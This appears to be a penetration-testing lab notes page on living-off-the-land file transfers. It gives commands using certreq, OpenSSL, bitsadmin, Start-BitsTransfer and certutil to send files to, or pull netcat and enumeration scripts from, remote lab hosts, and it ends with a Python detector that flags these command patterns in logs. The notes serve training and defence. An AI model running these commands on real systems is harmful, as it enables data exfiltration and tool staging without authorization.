Transfer & Exfiltration

Living off the Land (Binary Uploads/Downloads)

Notes and commands for living off the land binary uploads/downloads.

2024-03-28
Tags: file-transfer, living-of-the-land-binary-up-downloads

LOLBAS for Windows and GTFOBins for Linux.

LOLBAS (Windows)

Search for upload/download: https://lolbas-project.github.io/

Example upload (start a listener on the receiving host, then post the file from the Windows host):

sudo nc -lvnp 8000
C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

If -Post fails, download an updated certreq.exe: https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe

GTFOBins (Linux)

Search for upload/download using +file download or +file upload.

Example with OpenSSL (often installed): generate a certificate, serve the file from one host, then fetch it from the other:

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Bitsadmin (HTTP/SMB downloads)

PS C:\htb> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
PS C:\htb> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Certutil

Always installed on Windows; similar to wget, but commonly flagged by antivirus.

C:\htb> certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
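
For the detection side of these notes, the following added example (not part of the original notes) flags the command-line shapes shown above in logged command lines and extracts the remote endpoint for triage. The rule names and sample lines are constructed for illustration; the `-urlcache` flag is not used on this page and is included as an assumption about what a defender would also want covered.

```python
import re

# Remote endpoint: HTTP(S) URL or UNC path (BITS also transfers over SMB).
REMOTE = r"(?P<remote>(?:https?://|\\\\)[^\s\"']+)"

# Rule names are labels invented for this example, not from any product.
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("certreq_post_upload", r"\bcertreq(?:\.exe)?\s.*-post\b.*?" + REMOTE),
    ("bitsadmin_transfer", r"\bbitsadmin(?:\.exe)?\s.*/transfer\b.*?" + REMOTE),
    ("start_bitstransfer", r"\bstart-bitstransfer\b.*?-source\s+[\"']?" + REMOTE),
    # -urlcache is not used on this page; included as certutil's other download flag.
    ("certutil_download", r"\bcertutil(?:\.exe)?\s.*-(?:verifyctl|urlcache)\b.*?" + REMOTE),
    # Shell redirection is not part of the logged argv, so key on -quiet with -connect.
    ("openssl_s_client_quiet",
     r"\bopenssl\s+s_client\b(?=.*\s-quiet\b).*-connect\s+(?P<remote>\S+)"),
]]


def detect(cmdline):
    """Return (rule_name, remote_endpoint) for the first matching rule, else None."""
    for name, rx in RULES:
        m = rx.search(cmdline)
        if m:
            return name, m.group("remote")
    return None


def scan(cmdlines):
    """Return [(cmdline, (rule, remote)), ...] for every flagged command line."""
    return [(c, hit) for c in cmdlines if (hit := detect(c))]


# Constructed command lines (as process-creation or script-block logging would
# record them): the commands from this page plus two benign uses.
SAMPLES = [
    r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini",
    r"certreq.exe -new request.inf request.csr",
    r"bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe",
    r"Start-BitsTransfer -Source 'http://10.10.10.32:8000/nc.exe' -Destination 'C:\Windows\Temp\nc.exe'",
    r"certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe",
    r"certutil.exe -hashfile C:\Temp\setup.exe SHA256",
    r"openssl s_client -connect 10.10.10.32:80 -quiet",
]

if __name__ == "__main__":
    for cmd, (rule, remote) in scan(SAMPLES):
        print(f"{rule:24}{remote:34}{cmd}")
```

Matching on the flag plus a remote endpoint, rather than on the binary name alone, keeps routine uses such as `certutil -hashfile` or `certreq -new` out of the results.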